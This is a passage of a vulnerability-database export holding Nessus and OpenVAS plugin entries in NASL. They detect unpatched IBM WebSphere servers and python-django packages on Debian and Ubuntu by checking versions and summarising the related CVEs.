(PM46234)", "cvss3": {"score": null, "vector": null}, "published": "2011-09-30T00:00:00", "type": "nessus", "title": "IBM WebSphere Application Server 8.0 < Fix Pack 1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1355", "CVE-2011-1356", "CVE-2011-1359", "CVE-2011-1368", "CVE-2011-1411", "CVE-2011-3192"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:ibm:websphere_application_server"], "id": "WEBSPHERE_8_0_0_1.NASL", "href": "https://www.tenable.com/plugins/nessus/56348", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56348);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\n \"CVE-2011-1355\",\n \"CVE-2011-1356\",\n \"CVE-2011-1359\",\n \"CVE-2011-1368\",\n \"CVE-2011-1411\",\n \"CVE-2011-3192\"\n );\n script_bugtraq_id(48709, 48710, 48890, 49303, 49362, 49766, 50463);\n\n script_name(english:\"IBM WebSphere Application Server 8.0 < Fix Pack 1 Multiple Vulnerabilities\");\n script_summary(english:\"Reads the version number from the SOAP port\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote application server may be affected by multiple \nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM WebSphere Application Server 8.0 before Fix Pack 1 appears to be\nrunning on the remote host and is potentially affected by the \nfollowing vulnerabilities :\n\n - An open redirect vulnerability exists related to the\n 'logoutExitPage' parameter. This can allow remote\n attackers to trick users into requesting unintended\n URLs. (PM35701)\n\n - The administrative console can display a stack trace\n under unspecified circumstances and can disclose\n potentially sensitive information to local users.\n (PM36620)\n\n - An unspecified error exists that can allow cross-site \n request forgery attacks. 
(PM36734)\n\n - A token verification error exists in the bundled\n OpenSAML library. This error can allow an attacker to\n bypass security controls with an XML signature wrapping\n attack via SOAP messages. (PM43254)\n\n - A directory traversal attack is possible via unspecified\n parameters in the 'help' servlet. (PM45322)\n\n - The JavaServer Faces (JSF) application functionality \n could allow a remote attacker to read files because it\n fails to properly handle requests. (PM45992)\n\n - The HTTP server contains an error in the 'ByteRange'\n filter and can allow denial of service attacks when\n processing malicious requests. (PM46234)\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://www-01.ibm.com/support/docview.wss?uid=swg27022958\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://www-01.ibm.com/support/docview.wss?uid=swg24030916\"\n );\n # PM46234\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21512087\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply Fix Pack 1 for version 8.0 (8.0.0.1) or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:ibm:websphere_application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"websphere_detect.nasl\");\n script_require_ports(\"Services/www\", 8880, 8881);\n script_require_keys(\"www/WebSphere\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8880, embedded:0);\n\n\nversion = get_kb_item(\"www/WebSphere/\"+port+\"/version\");\nif (isnull(version)) exit(1, \"Failed to extract the version from the IBM WebSphere Application Server instance listening on port \" + port + \".\");\nif (version =~ \"^[0-9]+(\\.[0-9]+)?$\")\n exit(1, \"Failed to extract a granular version from the IBM WebSphere Application Server instance listening on port \" + port + \".\");\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (ver[0] == 8 && ver[1] == 0 && ver[2] == 0 && ver[3] < 1)\n{\n if (report_verbosity > 0)\n {\n source = get_kb_item_or_exit(\"www/WebSphere/\"+port+\"/source\");\n\n report = \n '\\n Source : ' + source + \n '\\n Installed version : ' + version +\n '\\n Fixed version : 8.0.0.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse exit(0, \"The WebSphere Application Server \"+version+\" instance listening on port \"+port+\" is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-07-11T15:49:30", "description": "IBM WebSphere Application Server 6.1 before Fix Pack 41 appears to be running on the remote host. As such, it is potentially affected by the following vulnerabilities :\n\n - A cross-site scripting vulnerability via vectors related to web messaging. 
(CVE-2011-5065)\n\n - A cross-site scripting vulnerability in the Installation Verification Test (IVT) in the Install component.\n (CVE-2011-1362)\n\n - The SibRaRecoverableSiXaResource class in the Default Messaging Component does not properly handle a Service Integration Bus (SIB) dump operation involving the Failure Data Capture (FFDC) introspection code. This can allow local users to obtain sensitive information by reading the FFDC log file. (CVE-2011-5066)\n\n - A directory traversal vulnerability in the administration console that allows remote attackers to read arbitrary files on the host. (CVE-2011-1359)\n\n - A potential Denial of Service with malicious range requests. (CVE-2011-3192)\n\n - An unspecified vulnerability in the Web Services Security component when enabling WS-Security for a JAX-WS application. (CVE-2011-1377)", "cvss3": {"score": null, "vector": null}, "published": "2012-01-19T00:00:00", "type": "nessus", "title": "IBM WebSphere Application Server 6.1 < 6.1.0.41 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1359", "CVE-2011-1362", "CVE-2011-1377", "CVE-2011-3192", "CVE-2011-5065", "CVE-2011-5066"], "modified": "2018-08-06T00:00:00", "cpe": ["cpe:/a:ibm:websphere_application_server"], "id": "WEBSPHERE_6_1_0_41.NASL", "href": "https://www.tenable.com/plugins/nessus/57607", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(57607);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\n \"CVE-2011-1359\",\n \"CVE-2011-1362\",\n \"CVE-2011-1377\",\n \"CVE-2011-3192\",\n \"CVE-2011-5065\",\n \"CVE-2011-5066\"\n );\n script_bugtraq_id(49362, 50310, 51559, 51560);\n\n script_name(english:\"IBM WebSphere Application Server 6.1 < 6.1.0.41 Multiple Vulnerabilities\");\n script_summary(english:\"Reads the version number from the SOAP port\");\n\n script_set_attribute(\n 
attribute:\"synopsis\",\n value:\n\"The remote application server is affected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"IBM WebSphere Application Server 6.1 before Fix Pack 41 appears to be\nrunning on the remote host. As such, it is potentially affected by\nthe following vulnerabilities :\n\n - A cross-site scripting vulnerability via vectors\n related to web messaging. (CVE-2011-5065)\n\n - A cross-site scripting vulnerability in the Installation\n Verification Test (IVT) in the Install component.\n (CVE-2011-1362)\n\n - The SibRaRecoverableSiXaResource class in the Default\n Messaging Component does not properly handle a Service\n Integration Bus (SIB) dump operation involving the\n Failure Data Capture (FFDC) introspection code. This\n can allow local users to obtain sensitive information by\n reading the FFDC log file. (CVE-2011-5066)\n\n - A directory traversal vulnerability in the\n administration console that allows remote attackers to\n read arbitrary files on the host. (CVE-2011-1359)\n\n - A potential Denial of Service with malicious range\n requests. (CVE-2011-3192)\n\n - An unspecified vulnerability in the Web Services\n Security component when enabling WS-Security for a\n JAX-WS application. (CVE-2011-1377)\"\n );\n script_set_attribute(attribute:\"see_also\",value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21404665\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www-01.ibm.com/support/docview.wss?uid=swg27009778\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg24031034\");\n\n script_set_attribute(attribute:\"solution\", value:\n\"If using WebSphere Application Server, apply Fix Pack 41 (6.1.0.41) or\nlater. 
\n\nOtherwise, if using embedded WebSphere Application Server packaged with\nTivoli Directory Server, apply the latest recommended eWAS fix pack.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:websphere_application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"websphere_detect.nasl\");\n script_require_ports(\"Services/www\", 8880, 8881);\n script_require_keys(\"www/WebSphere\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8880, embedded:FALSE);\n\n\nversion = get_kb_item(\"www/WebSphere/\"+port+\"/version\");\nif (isnull(version)) exit(1, \"Failed to extract the version from the IBM WebSphere Application Server instance listening on port \" + port + \".\");\nif (version =~ \"^[0-9]+(\\.[0-9]+)?$\")\n exit(1, \"Failed to extract a granular version from the IBM WebSphere Application 
Server instance listening on port \" + port + \".\");\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (ver[0] == 6 && ver[1] == 1 && ver[2] == 0 && ver[3] < 41)\n{\n if (report_verbosity > 0)\n {\n source = get_kb_item_or_exit(\"www/WebSphere/\"+port+\"/source\");\n\n report =\n '\\n Source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 6.1.0.41' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n exit(0);\n}\nelse exit(0, \"The WebSphere Application Server \"+version+\" instance listening on port \"+port+\" is not affected.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:38:45", "description": "The remote host is missing an update to python-django\nannounced via advisory DSA 2332-1.", "cvss3": {}, "published": "2012-02-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2332-1 (python-django)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4140", "CVE-2011-4138", "CVE-2011-4139"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231070548", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070548", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2332_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2332-1 (python-django)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70548\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\", \"CVE-2011-4140\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:22 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2332-1 (python-django)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202332-1\");\n script_tag(name:\"insight\", value:\"Paul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework:\n\nCVE-2011-4136\n\nWhen using memory-based sessions and caching, Django sessions are\nstored directly in the root namespace of the cache. When user data is\nstored in the same cache, a remote user may take over a session.\n\nCVE-2011-4137, CVE-2011-4138\n\nDjango's field type URLfield by default checks supplied URL's by\nissuing a request to it, which doesn't time out. A Denial of Service\nis possible by supplying specially prepared URL's that keep the\nconnection open indefinitely or fill the Django's server memory.\n\nCVE-2011-4139\n\nDjango used X-Forwarded-Host headers to construct full URL's. 
This\nheader may not contain trusted input and could be used to poison the\ncache.\n\nCVE-2011-4140\n\nThe CSRF protection mechanism in Django does not properly handle\nweb-server configurations supporting arbitrary HTTP Host headers,\nwhich allows remote attackers to trigger unauthenticated forged\nrequests.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\n\nFor the testing (wheezy) and unstable distribution (sid), this problem\nhas been fixed in version 1.3.1-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your python-django packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to python-django\nannounced via advisory DSA 2332-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.0.2-1+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.3-3+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-django-doc\", ver:\"1.2.3-3+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:33", "description": "The remote host is missing an update to python-django\nannounced via advisory DSA 2332-1.", "cvss3": {}, "published": "2012-02-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2332-1 (python-django)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4140", 
"CVE-2011-4138", "CVE-2011-4139"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70548", "href": "http://plugins.openvas.org/nasl.php?oid=70548", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2332_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2332-1 (python-django)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework:\n\nCVE-2011-4136\n\nWhen using memory-based sessions and caching, Django sessions are\nstored directly in the root namespace of the cache. When user data is\nstored in the same cache, a remote user may take over a session.\n\nCVE-2011-4137, CVE-2011-4138\n\nDjango's field type URLfield by default checks supplied URL's by\nissuing a request to it, which doesn't time out. 
A Denial of Service\nis possible by supplying specially prepared URL's that keep the\nconnection open indefinitely or fill the Django's server memory.\n\nCVE-2011-4139\n\nDjango used X-Forwarded-Host headers to construct full URL's. This\nheader may not contain trusted input and could be used to poison the\ncache.\n\nCVE-2011-4140\n\nThe CSRF protection mechanism in Django does not properly handle\nweb-server configurations supporting arbitrary HTTP Host headers,\nwhich allows remote attackers to trigger unauthenticated forged\nrequests.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\n\nFor the testing (wheezy) and unstable distribution (sid), this problem\nhas been fixed in version 1.3.1-1.\n\nWe recommend that you upgrade your python-django packages.\";\ntag_summary = \"The remote host is missing an update to python-django\nannounced via advisory DSA 2332-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202332-1\";\n\nif(description)\n{\n script_id(70548);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\", \"CVE-2011-4140\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:22 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2332-1 (python-django)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.0.2-1+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.3-3+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-django-doc\", ver:\"1.2.3-3+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:26:58", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1297-1", "cvss3": {}, "published": "2011-12-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for python-django USN-1297-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840830", "href": "http://plugins.openvas.org/nasl.php?oid=840830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1297_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for python-django USN-1297-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone 
Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul McMillan discovered that Django used the root namespace when storing\n cached session data. A remote attacker could exploit this to modify\n sessions. (CVE-2011-4136)\n\n Paul McMillan discovered that Django would not timeout on arbitrary URLs\n when the application used URLFields. This could be exploited by a remote\n attacker to cause a denial of service via resource exhaustion.\n (CVE-2011-4137)\n\n Paul McMillan discovered that while Django would check the validity of a\n URL via a HEAD request, it would instead use a GET request for the target\n of a redirect. This could potentially be used to trigger arbitrary GET\n requests via a crafted Location header. (CVE-2011-4138)\n\n It was discovered that Django would sometimes use a request's HTTP Host\n header to construct a full URL. 
A remote attacker could exploit this to\n conduct host header cache poisoning attacks via a crafted request.\n (CVE-2011-4139)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1297-1\";\ntag_affected = \"python-django on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1297-1/\");\n script_id(840830);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-09 10:52:57 +0530 (Fri, 09 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"USN\", value: \"1297-1\");\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\");\n script_name(\"Ubuntu Update for python-django USN-1297-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.3-1ubuntu0.2.10.10.3\", rls:\"UBUNTU10.10\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.1.1-2ubuntu1.4\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.5-1ubuntu1.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:43", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1297-1", "cvss3": {}, "published": "2011-12-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for python-django USN-1297-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840830", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1297_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for python-django USN-1297-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1297-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840830\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-09 10:52:57 +0530 (Fri, 09 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name:\"USN\", value:\"1297-1\");\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\");\n script_name(\"Ubuntu Update for python-django USN-1297-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.10|10\\.04 LTS|11\\.04)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1297-1\");\n script_tag(name:\"affected\", value:\"python-django on Ubuntu 11.04,\n Ubuntu 10.10,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Paul McMillan discovered that Django used the root namespace when storing\n cached session data. A remote attacker could exploit this to modify\n sessions. 
